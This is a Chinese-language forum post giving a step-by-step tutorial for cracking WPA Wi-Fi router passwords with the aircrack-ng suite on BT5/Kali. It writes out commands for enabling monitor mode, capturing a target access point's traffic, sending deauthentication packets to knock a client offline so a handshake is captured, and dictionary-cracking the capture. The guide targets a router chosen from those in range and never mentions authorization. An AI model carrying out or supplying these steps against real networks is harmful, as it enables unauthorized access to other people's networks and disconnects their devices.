找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3984|回复: 0
打印 上一主题 下一主题

BT5/Kali 破解无线路由密码

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:52:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
写在前面的废话
关于无线密码的破解成功与否除了准备一个好的工具你还要洗好脸
无线密码的破解除了前面需要成功的捕捉到 .cap  外还需要一个跑密码的字典
字典的大小决定了你破解成功的成功率,当然了字典越大跑的时间越久.
如果是小字典的话洗干净脸了能跑出来.在我自己的残机上3G的小字典跑完用了将近8个小时
其次不一定只有BT5和Kali才能破解,基本上ubuntu,debian等都可以.windows还有现成的GUI工具

--------------------我是万恶的分割线--------------------


1> 打开BT5的wicd network manager 选择一个信号好的,然后点击"properties(属性)" .打开后继续点击里面的"信息(属性)查看AP的MAC地址和channel信道号并记录下来

2>ifconfig查看自己无线网卡的名字,这里我自己的无线网卡名字是wlan0.

3>开启无线监控 airmon-ng start 无线设备名字 channel号   eg: airmon-ng start wlan0 4
//如果看到有提示XXXX XXXX进程影响的,执行 kill XXX XXX  XXX为给出的进程号,然后重新执行上面语句直到不报错

4>监控开启后就选择好了我们的目标AP执行下面命令
airodump-ng -w loiter -c 4 --bssid AP's MAC mon0
//* AP's MAC 为之前查看到的AP的MAC地址,这时我们只需要看到几个地方
BSSID下的地址是AP MAC . STATION下的地址是CP MAC
然后根据得到的Client的MAC地址,从中选择一个活跃的*//

5>打开一个新的终端,而之前的终端不要关闭,在新的终端输入
aireplay-ng -0 10 -a AP's MAC -c CP's MAC mon0
//AP's MAC是BSSID下的地址,CP's MAC是 STATION下的地址是CP
执行命令后在回到第一个终端看是否出现 WAP Handshake标志,如果出现就已经抓到握手了.如果没有那么继续执行命令直到出现

6>执行 aircrack-ng -w password.txt -b AP's MAC loiter.cap
//password.txt为字典文件,自己配置的文件也需要放到默认的路径下

7>看脸的时刻到了,破解成功会显示出密码.忘了截图没有截图参考.可以google一下有相关的成功截图

8>各命令的解释以及在步骤6会遇到的问题

[1]
airodump-ng -w loiter -c 4 --bssid AP's MAC mon0
//*从mon0利用4信道扑获无线AP的数据,保存到loiter.cap文件,通常在root目录下,如果扑获多次则文件名递增loiter-001.cap
-w loiter:扑获的文件名;    -c 4 :信道4 *//

aireplay-ng -0 10 -a AP's MAC -c CP's MAC mon0
//-a :AP's MAC  ;  -c:CP's MAC ,   此命令一旦执行客户机有断网的可能

aircrack-ng -w password.txt -b AP's MAC loiter.cap
这句命令直接运行可能会出错,因为路径不对.上面的命令以我自己的机器为例可以写成
aircrack-ng -w /root/Dictionary/pw3G.txt -b AP's MAC /root/loiter.cap​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表